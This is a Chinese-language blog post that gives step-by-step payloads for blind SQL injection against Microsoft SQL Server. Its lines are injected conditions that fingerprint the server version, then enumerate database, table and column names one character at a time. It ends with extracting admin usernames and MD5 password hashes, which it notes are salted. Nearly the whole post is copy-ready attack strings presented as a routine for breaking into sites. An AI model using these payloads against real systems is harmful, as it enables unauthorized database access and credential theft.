注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

mssql盲注常规步骤  

2015-03-14 17:04:07|  分类: SQL injection |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
盲注常规步骤:
判断数据库类型:
' and substring((select @@version),22,4)='2005' ;--

猜数据库名:

先猜dbid:

' and (select count(*) from master.dbo.sysdatabases where dbid=5)=1 ;--

根据dbid猜库名,先猜出长度:

' and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1 ;--

再逐位猜:

' and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1 ;--


猜表名(假设库名已经猜出为database):

可以尝试先看有没管理表:

' and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '?min%')=1 ;--


猜第一个,先长度:

' and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1 ;--

猜第一个表名,逐位猜:

' and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1 ;--

猜第二个表名(假设第一个为table1):

' and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1 ;--

...

猜字段(假设表名已经猜出为table):
猜第一个字段:

' and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1 ;--

猜第二个(假设第一个为column1)

' and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1 ;--

...

猜数据(假设要猜的字段为name):
' and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1 ;--

通过此方法可以爆出后台账户 以及 MD5密码。 但是后台MD5加密都是跟了后缀 比较难解密 FormsAuthentication.HashPasswordForStoringInConfigFile(pwd + "@4!@#$%@", "md5"))
  评论这张
 
阅读(67)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017